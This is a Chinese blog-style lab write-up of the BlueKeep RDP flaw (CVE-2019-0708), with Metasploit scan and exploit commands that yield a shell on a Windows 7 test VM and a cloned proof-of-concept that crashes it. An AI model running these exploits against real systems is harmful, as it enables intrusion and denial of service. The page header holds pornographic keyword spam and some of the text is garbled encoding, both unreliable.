日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

CVE-2019-0708(BlueKeep)漏洞分析与复现

發(fā)布時(shí)間:2024/9/30 编程问答 49 豆豆
生活随笔 收集整理的這篇文章主要介紹了 CVE-2019-0708(BlueKeep)漏洞分析与复现 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

文章目錄

      • 一、 漏洞簡(jiǎn)介
        • 1、漏洞介紹:
        • 2、漏洞原理:
        • 3、影響版本:
      • 二、 漏洞復(fù)現(xiàn)
        • 復(fù)現(xiàn)環(huán)境:
        • 復(fù)現(xiàn)過(guò)程:
          • 1、主機(jī)發(fā)現(xiàn):
          • 2、使用MSF的漏洞模塊:
          • 3、對(duì)靶機(jī)進(jìn)行漏洞掃描:
          • 4、使用攻擊模塊,對(duì)靶機(jī)進(jìn)行攻擊
          • 5、使用POC,進(jìn)行藍(lán)屏攻擊

一、 漏洞簡(jiǎn)介

1、漏洞介紹:

2019年5月14日微軟官方發(fā)布安全補(bǔ)丁,修復(fù)了 Windows 遠(yuǎn)程桌面服務(wù)的遠(yuǎn)程代碼執(zhí)行漏洞,該漏洞影響了某些舊版本的 Windows 系統(tǒng)。此漏洞是預(yù)身份驗(yàn)證,無(wú)需用戶交互,這就意味著這個(gè)漏洞可以通過(guò)網(wǎng)絡(luò)蠕蟲(chóng)的方式被利用,與2017年 WannaCry 勒索病毒的傳播方式類似。

2、漏洞原理:

存在漏洞的遠(yuǎn)程桌面服務(wù)器,在接收到特殊數(shù)據(jù)包時(shí)會(huì)釋放一個(gè)內(nèi)部信道 MS_T120 的控制結(jié)構(gòu)體,但并未將指向該結(jié)構(gòu)體的指針刪除,而且在遠(yuǎn)程桌面連接結(jié)束之后還會(huì)調(diào)用 MS_T120 結(jié)構(gòu)體內(nèi)的一個(gè)函數(shù)指針,若攻擊者可通過(guò)遠(yuǎn)程發(fā)送數(shù)據(jù)重新占據(jù)被釋放的 MS_T120,并為結(jié)構(gòu)體內(nèi)的函數(shù)指針賦恰當(dāng)?shù)闹?#xff0c;即可實(shí)現(xiàn)遠(yuǎn)程命令執(zhí)行。

3、影響版本:

目前已知受影響的 Windows 版本包括但不限于:

Windows 7
Windows Server 2008
Windows Server 2008 R2
Windows Server 2003
Windows XP

Windows 8 和 windows10 以及之后的版本不受此漏洞影響

二、 漏洞復(fù)現(xiàn)

復(fù)現(xiàn)環(huán)境:

  • 攻擊機(jī):Linux kali(IP:192.168.50.130)

  • 靶機(jī):Windows 7 Enterprise with Service Pack 1 (x64)(IP:192.168.50.132)

條件:兩臺(tái)機(jī)子可以相互ping通,并且靶機(jī)(無(wú)補(bǔ)丁)開(kāi)啟了3389端口,防火墻是關(guān)閉的!

復(fù)現(xiàn)過(guò)程:

1、主機(jī)發(fā)現(xiàn):

登錄 kali linux,用 nmap 探測(cè)本網(wǎng)段存活主機(jī)

nmap 192.168.50.0/24


可以看到靶機(jī)的3389端口是開(kāi)放的。

2、使用MSF的漏洞模塊:

打開(kāi)MSF:msfconsole

搜索 CVE-2019-0708 漏洞模塊

search cve-2019-0708


得到兩個(gè)模塊,一個(gè)是掃描功能,一個(gè)是攻擊功能。

3、對(duì)靶機(jī)進(jìn)行漏洞掃描:

使用模塊:

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

設(shè)置目標(biāo)IP或網(wǎng)段:

set rhosts 192.168.50.132

執(zhí)行掃描:run

結(jié)果顯示靶機(jī)存在這個(gè)漏洞。

4、使用攻擊模塊,對(duì)靶機(jī)進(jìn)行攻擊

使用攻擊模塊:

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

設(shè)置攻擊目標(biāo)IP

set rhosts 192.168.50.132

查看當(dāng)前攻擊配置

show options

執(zhí)行攻擊:exploit 或 run


發(fā)現(xiàn)攻擊失敗了,查了一下,知道這里還需要設(shè)置 target 參數(shù),指定靶機(jī)的安裝環(huán)境。這里默認(rèn)是自動(dòng)識(shí)別。

查看 target

show targets


1是真實(shí)機(jī)器,這里根據(jù)真實(shí)情況,選擇5

set target 5

再次執(zhí)行攻擊


攻擊成功!并且得到靶機(jī)的shell。

5、使用POC,進(jìn)行藍(lán)屏攻擊

1、下載poc

git clone https://github.com/n1xbyte/cve-2019-0708

2、安裝所需要的庫(kù)

kali里默認(rèn)沒(méi)有pip3,先安裝pip3,再安裝impacket庫(kù)

apt-get install python3-pippip3 install impacket

3、執(zhí)行POC攻擊

python3 crashpoc.py 192.168.50.132 64 #ip地址 系統(tǒng)版本


成功藍(lán)屏!

總結(jié)

以上是生活随笔為你收集整理的CVE-2019-0708(BlueKeep)漏洞分析与复现的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。